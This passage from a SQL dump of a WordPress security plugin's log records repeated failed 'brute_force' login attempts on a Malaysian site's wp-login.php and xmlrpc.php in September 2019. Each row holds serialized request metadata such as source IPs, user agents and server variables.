16:30:08',17740096,19229736,'https://bintara.com.my/wp-login.php',1,0,'37.247.54.2'),(24639,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"37.247.54.2\";s:11:\"REMOTE_PORT\";s:5:\"59212\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEKE8ptRwTKB9qWFzHe6wAAAAI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568737811.4699\";s:12:\"REQUEST_TIME\";s:10:\"1568737811\";}}','notice','2019-09-17 16:30:13','2019-09-17 16:30:11',18256240,19553656,'https://bintara.com.my/xmlrpc.php',1,0,'37.247.54.2'),(24640,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.136.84\";s:11:\"REMOTE_PORT\";s:5:\"41318\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYELdH-mRYMgL5SYt2EPUgAAAVE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568738164.2598\";s:12:\"REQUEST_TIME\";s:10:\"1568738164\";}}','notice','2019-09-17 16:36:05','2019-09-17 16:36:04',17740248,19230648,'https://bintara.com.my/wp-login.php',1,0,'139.59.136.84'),(24641,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.136.84\";s:11:\"REMOTE_PORT\";s:5:\"42384\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYELd0ViJhUiKk@yAoe5dwAAAZc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568738167.608\";s:12:\"REQUEST_TIME\";s:10:\"1568738167\";}}','notice','2019-09-17 16:36:08','2019-09-17 16:36:07',18257720,19555920,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.136.84'),(24642,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"204.15.133.176\";s:11:\"REMOTE_PORT\";s:5:\"46772\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYENWkViJhUiKk@yAoe6xwAAAZI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568738650.5334\";s:12:\"REQUEST_TIME\";s:10:\"1568738650\";}}','notice','2019-09-17 16:44:12','2019-09-17 16:44:11',17740720,19232624,'https://bintara.com.my/wp-login.php',1,0,'204.15.133.176'),(24643,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"204.15.133.176\";s:11:\"REMOTE_PORT\";s:5:\"47264\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYENXUViJhUiKk@yAoe6yQAAAYs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568738653.6473\";s:12:\"REQUEST_TIME\";s:10:\"1568738653\";}}','notice','2019-09-17 16:44:16','2019-09-17 16:44:14',18257624,19556776,'https://bintara.com.my/xmlrpc.php',1,0,'204.15.133.176'),(24644,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.169.232.130\";s:11:\"REMOTE_PORT\";s:5:\"38500\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYENw0ViJhUiKk@yAoe7AAAAAZg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568738755.464\";s:12:\"REQUEST_TIME\";s:10:\"1568738755\";}}','notice','2019-09-17 16:45:57','2019-09-17 16:45:55',17740064,19230968,'https://bintara.com.my/wp-login.php',1,0,'192.169.232.130'),(24645,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.169.232.130\";s:11:\"REMOTE_PORT\";s:5:\"39834\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYENy-gg4cIpXyxKa543LAAAAFA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568738764.0276\";s:12:\"REQUEST_TIME\";s:10:\"1568738764\";}}','notice','2019-09-17 16:46:06','2019-09-17 16:46:04',18258552,19558160,'https://bintara.com.my/xmlrpc.php',1,0,'192.169.232.130'),(24646,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.232.229\";s:11:\"REMOTE_PORT\";s:5:\"53220\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEOeEViJhUiKk@yAoe7VQAAAY8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568738937.0566\";s:12:\"REQUEST_TIME\";s:10:\"1568738937\";}}','notice','2019-09-17 16:48:58','2019-09-17 16:48:57',17742304,19233232,'https://bintara.com.my/wp-login.php',1,0,'162.241.232.229'),(24647,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.232.229\";s:11:\"REMOTE_PORT\";s:5:\"54152\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEOfEViJhUiKk@yAoe7VwAAAYg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568738940.4041\";s:12:\"REQUEST_TIME\";s:10:\"1568738940\";}}','notice','2019-09-17 16:49:01','2019-09-17 